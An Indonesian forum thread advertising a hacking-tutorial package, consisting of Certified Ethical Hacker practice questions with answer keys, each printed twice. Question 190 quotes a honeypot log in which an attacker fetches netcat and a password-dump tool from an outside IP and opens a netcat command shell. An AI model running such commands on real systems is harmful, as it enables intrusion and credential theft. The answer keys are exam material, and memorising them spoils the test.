-
Saat ini Anda mengakses IndoForum sebagai tamu, sehingga Anda tidak memiliki akses penuh untuk melihat artikel dan diskusi yang hanya tersedia bagi anggota. Dengan bergabung, Anda akan mendapatkan akses penuh untuk bertanya, mengirim pesan pribadi, mengikuti polling, dan menggunakan fitur-fitur lainnya. Proses pendaftaran sangat cepat, mudah, dan gratis.
Silakan daftar dan validasi email Anda untuk mendapatkan akses penuh sebagai anggota. Harap masukkan alamat email yang valid dan periksa kotak masuk Anda setelah mendaftar untuk proses validasi.
|
LOUNGE |
TANYA JAWAB |
KESEHATAN |
MUSIC |
MOVIES |
OLAHRAGA |
KULINER |
ANIME |
JOKES
GAMES |
COMPUTER |
OTOMOTIF |
PETS |
PONSEL |
DEBATE |
GALLERY |
YOUTH |
BERITA & POLITIK
CURHAT |
RELIGI |
MISTERI |
GAYA HIDUP |
EDUKASI |
SARAN |
TEST
|
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an alternative browser.
You should upgrade or use an alternative browser.
DVD PAKET TUTORIAL HACKING - + TOOLS & OS - Career Academy & Certified Ethical Hacker
- Pembuat thread awal. chinonk
- Tanggal Mulai
QUESTION 3:
Who is an Ethical Hacker?
A. A person whohacksfor ethical reasons
B. A person whohacksfor an ethical cause
C. A person whohacksfor defensive purposes
D. A person whohacksfor offensive purposes
Answer: C
Who is an Ethical Hacker?
A. A person whohacksfor ethical reasons
B. A person whohacksfor an ethical cause
C. A person whohacksfor defensive purposes
D. A person whohacksfor offensive purposes
Answer: C
QUESTION 288:
You want to carry out session hijacking on a remote server. The server and the
client are communicating via TCP after a successful TCP three way handshake. The
server has just received packet #120 from the client. The client has a receive window
of 200 and the server has a receive window of 250.
Within what range of sequence numbers should a packet, sent by the client fall in
order to be accepted by the server?
A. 200-250
B. 121-371
C. 120-321
D. 121-231
E. 120-370
Answer: B
You want to carry out session hijacking on a remote server. The server and the
client are communicating via TCP after a successful TCP three way handshake. The
server has just received packet #120 from the client. The client has a receive window
of 200 and the server has a receive window of 250.
Within what range of sequence numbers should a packet, sent by the client fall in
order to be accepted by the server?
A. 200-250
B. 121-371
C. 120-321
D. 121-231
E. 120-370
Answer: B
QUESTION 7:
You are footprinting Acme.com to gather competitive intelligence. You visit the acme.com websire for contact information and telephone number numbers but do not find it listed there. You know that they had the entire staff directory listed on their website 12 months ago but now it is not there. How would it be possible for you to retrieve information from the website that is outdated?
A. Visit google search engine and view the cached copy.
B. Visit Archive.org site to retrieve the Internet archive of the acme website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners and customers website for this information.
Answer: B
You are footprinting Acme.com to gather competitive intelligence. You visit the acme.com websire for contact information and telephone number numbers but do not find it listed there. You know that they had the entire staff directory listed on their website 12 months ago but now it is not there. How would it be possible for you to retrieve information from the website that is outdated?
A. Visit google search engine and view the cached copy.
B. Visit Archive.org site to retrieve the Internet archive of the acme website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners and customers website for this information.
Answer: B
QUESTION 9:
Which of the following activities will NOT be considered as passive footprinting?
A. Go through the rubbish to find out any information that might have been discarded.
B. Search on financial site such as Yahoo Financial to identify assets.
C. Scan the range of IP address found in the target DNS database.
D. Perform multiples queries using a search engine.
Answer: C
Which of the following activities will NOT be considered as passive footprinting?
A. Go through the rubbish to find out any information that might have been discarded.
B. Search on financial site such as Yahoo Financial to identify assets.
C. Scan the range of IP address found in the target DNS database.
D. Perform multiples queries using a search engine.
Answer: C
QUESTION 10:
Which one of the following is defined as the process of distributing incorrect
Internet Protocol (IP) addresses/names with the intent of diverting traffic?
A. Network aliasing
B. Domain Name Server (DNS) poisoning
C. Reverse Address Resolution Protocol (ARP)
D. Port scanning
Answer: B
Which one of the following is defined as the process of distributing incorrect
Internet Protocol (IP) addresses/names with the intent of diverting traffic?
A. Network aliasing
B. Domain Name Server (DNS) poisoning
C. Reverse Address Resolution Protocol (ARP)
D. Port scanning
Answer: B
QUESTION 328:
A file integrity program such as Tripwire protects against Trojan horse attacks by:
A. Automatically deleting Trojan horse programs
B. Rejecting packets generated by Trojan horse programs
C. Using programming hooks to inform the kernel of Trojan horse behavior
D. Helping you catch unexpected changes to a system utility file that might indicate
it had been replaced by a Trojan horse
Answer: D
A file integrity program such as Tripwire protects against Trojan horse attacks by:
A. Automatically deleting Trojan horse programs
B. Rejecting packets generated by Trojan horse programs
C. Using programming hooks to inform the kernel of Trojan horse behavior
D. Helping you catch unexpected changes to a system utility file that might indicate
it had been replaced by a Trojan horse
Answer: D
QUESTION 146:
What do you call a system where users need to remember only one username and
password, and be authenticated for multiple services?
A. Simple Sign-on
B. Unique Sign-on
C. Single Sign-on
D. Digital Certificate
Answer: C
What do you call a system where users need to remember only one username and
password, and be authenticated for multiple services?
A. Simple Sign-on
B. Unique Sign-on
C. Single Sign-on
D. Digital Certificate
Answer: C
QUESTION 259:
To scan a host downstream from a security gateway, Firewalking:
A. Sends a UDP-based packet that it knows will be blocked by the firewall to determine how specifically the firewall responds to such packets
B. Uses the TTL function to send packets with a TTL value set to expire one hop past the identified security gateway
C. Sends an ICMP ''administratively prohibited'' packet to determine if the gateway will
drop the packet without comment.
D. Assesses the security rules that relate to the target system before it sends packets to any hops on the route to the gateway
Answer: B
To scan a host downstream from a security gateway, Firewalking:
A. Sends a UDP-based packet that it knows will be blocked by the firewall to determine how specifically the firewall responds to such packets
B. Uses the TTL function to send packets with a TTL value set to expire one hop past the identified security gateway
C. Sends an ICMP ''administratively prohibited'' packet to determine if the gateway will
drop the packet without comment.
D. Assesses the security rules that relate to the target system before it sends packets to any hops on the route to the gateway
Answer: B
QUESTION 12:
A Certkiller security System Administrator is reviewing the network system log files.
He notes the following:
- Network log files are at 5 MB at 12:00 noon.
- At 14:00 hours, the log files at 3 MB.
What should he assume has happened and what should he do about the situation?
A. He should contact the attacker's ISP as soon as possible and have the connection
disconnected.
B. He should log the event as suspicious activity, continue to investigate, and take further
steps according to site security policy.
C. He should log the file size, and archive the information, because the router crashed.
D. He should run a file system check, because the Syslog server has a self correcting file
system problem.
E. He should disconnect from the Internet discontinue any further unauthorized use,
because an attack has taken place.
Answer: B
A Certkiller security System Administrator is reviewing the network system log files.
He notes the following:
- Network log files are at 5 MB at 12:00 noon.
- At 14:00 hours, the log files at 3 MB.
What should he assume has happened and what should he do about the situation?
A. He should contact the attacker's ISP as soon as possible and have the connection
disconnected.
B. He should log the event as suspicious activity, continue to investigate, and take further
steps according to site security policy.
C. He should log the file size, and archive the information, because the router crashed.
D. He should run a file system check, because the Syslog server has a self correcting file
system problem.
E. He should disconnect from the Internet discontinue any further unauthorized use,
because an attack has taken place.
Answer: B
QUESTION 330:
Identify SQL injection attack from the HTTP requests shown below:
A. http://www.victim.com/example?accoun...ount=999999999
B.http://www.xsecurity.com/cgiin/bad.c..../bin/ls -al
C.http://www.myserver.com/search.asp?l...passwd='hA
x
D.http://www.myserver.com/script.php?m...urserver.c0m%2
f 3e%3c%2fscript%3e
Answer: C
Identify SQL injection attack from the HTTP requests shown below:
A. http://www.victim.com/example?accoun...ount=999999999
B.http://www.xsecurity.com/cgiin/bad.c..../bin/ls -al
C.http://www.myserver.com/search.asp?l...passwd='hA
x
D.http://www.myserver.com/script.php?m...urserver.c0m%2
f 3e%3c%2fscript%3e
Answer: C
QUESTION 301:
On wireless networks, SSID is used to identify the network. Why are SSID not
considered to be a good security mechanism to protect a wireless networks?
A. The SSID is only 32 bits in length.
B. The SSID is transmitted in clear text.
C. The SSID is the same as the MAC address for all vendors.
D. The SSID is to identify a station, not a network.
Answer: B
On wireless networks, SSID is used to identify the network. Why are SSID not
considered to be a good security mechanism to protect a wireless networks?
A. The SSID is only 32 bits in length.
B. The SSID is transmitted in clear text.
C. The SSID is the same as the MAC address for all vendors.
D. The SSID is to identify a station, not a network.
Answer: B
QUESTION 226:
You have just installed a new Linux file server at your office. This server is going to be used by several individuals in the organization, and unauthorized personnel must not be able to modify any data.
What kind of program can you use to track changes to files on the server?
A. Network Based IDS (NIDS)
B. Personal Firewall
C. System Integrity Verifier (SIV)
D. Linux IP Chains
Answer: C
You have just installed a new Linux file server at your office. This server is going to be used by several individuals in the organization, and unauthorized personnel must not be able to modify any data.
What kind of program can you use to track changes to files on the server?
A. Network Based IDS (NIDS)
B. Personal Firewall
C. System Integrity Verifier (SIV)
D. Linux IP Chains
Answer: C
QUESTION 114:
How can you determine if an LM hash you extracted contains a password that is less
than 8 characters long?
A. There is no way to tell because a hash cannot be reversed
B. The right most portion of the hash is always the same
C. The hash always starts with AB923D
D. The left most portion of the hash is always the same
E. A portion of the hash will be all 0's
Answer: B
How can you determine if an LM hash you extracted contains a password that is less
than 8 characters long?
A. There is no way to tell because a hash cannot be reversed
B. The right most portion of the hash is always the same
C. The hash always starts with AB923D
D. The left most portion of the hash is always the same
E. A portion of the hash will be all 0's
Answer: B
QUESTION 190:
The following excerpt is taken from a honeypot log that was hosted at
lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The
attacker makes a RDS query which results in the commands run as shown below:
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 e-cmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2k.
B. There are two attackers on the system - johna2k and haxedj00.
C. The attack is a remote exploit and the hacker downloads three files.
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.
Answer: C
The following excerpt is taken from a honeypot log that was hosted at
lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The
attacker makes a RDS query which results in the commands run as shown below:
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 e-cmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2k.
B. There are two attackers on the system - johna2k and haxedj00.
C. The attack is a remote exploit and the hacker downloads three files.
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.
Answer: C
QUESTION NO: 16
How can a TestKing administrator determine if a router has been configured when it is first powered up?
A. A configured router prompts for a password
B. A configured router goes to the privileged mode prompt
C. An un configured router goes into the setup dialog
D. An un configured router goes to the enable mode prompt
Answer: C
How can a TestKing administrator determine if a router has been configured when it is first powered up?
A. A configured router prompts for a password
B. A configured router goes to the privileged mode prompt
C. An un configured router goes into the setup dialog
D. An un configured router goes to the enable mode prompt
Answer: C
QUESTION 200:
Sandra is conducting a penetration test for Certkiller .com. She known that
Certkiller .com is using wireless networking for some of the offices in the building right down the street. Through social engineering she discovers that they are using 802.11g. Sandra knows that 802.11g uses the same 2.4GHz frequency range as 802.11b. Using NetStumbler and her 802.11b wireless NIC, Sandra drives over to the building to mape the wireless networks. However, even though she repositions herself around the building several times, Sandra is not able to detect a single AP.
What do you think is the reason behind this?
A. Netstumbler does not work against 802.11g.
B. You can only pick up 802.11g signals with 802.11a wireless cards.
C. The access points probably have WEP enabled so they cannot be etected.
D. The access points probably have disabled broadcasting of the SSID so they cannot be detected.
E. 802.11g uses OFDM while 802.11b uses DSSS so despite the same quency and 802.11b card cannot see an 802.11g signal.
F. Sandra must be doing something wrong, as there is no reason for her to not see the signals.
Answer: A
Sandra is conducting a penetration test for Certkiller .com. She known that
Certkiller .com is using wireless networking for some of the offices in the building right down the street. Through social engineering she discovers that they are using 802.11g. Sandra knows that 802.11g uses the same 2.4GHz frequency range as 802.11b. Using NetStumbler and her 802.11b wireless NIC, Sandra drives over to the building to mape the wireless networks. However, even though she repositions herself around the building several times, Sandra is not able to detect a single AP.
What do you think is the reason behind this?
A. Netstumbler does not work against 802.11g.
B. You can only pick up 802.11g signals with 802.11a wireless cards.
C. The access points probably have WEP enabled so they cannot be etected.
D. The access points probably have disabled broadcasting of the SSID so they cannot be detected.
E. 802.11g uses OFDM while 802.11b uses DSSS so despite the same quency and 802.11b card cannot see an 802.11g signal.
F. Sandra must be doing something wrong, as there is no reason for her to not see the signals.
Answer: A
QUESTION 179:
This kind of attack will let you assume a users identity at a dynamically generated web page or site:
A. SQL Injection
B. Cross Site Scripting
C. Session Hijacking
D. Zone Transfer
Answer: B
This kind of attack will let you assume a users identity at a dynamically generated web page or site:
A. SQL Injection
B. Cross Site Scripting
C. Session Hijacking
D. Zone Transfer
Answer: B
QUESTION 5:
Where should a security tester be looking for information that could be used by an
attacker against an organization? (Select all that apply)
A. CHAT rooms
B. WHOIS database
C. News groups
D. Web sites
E. Search engines
F. Organization's own web site
Answer: A, B, C, D, E, F
Where should a security tester be looking for information that could be used by an
attacker against an organization? (Select all that apply)
A. CHAT rooms
B. WHOIS database
C. News groups
D. Web sites
E. Search engines
F. Organization's own web site
Answer: A, B, C, D, E, F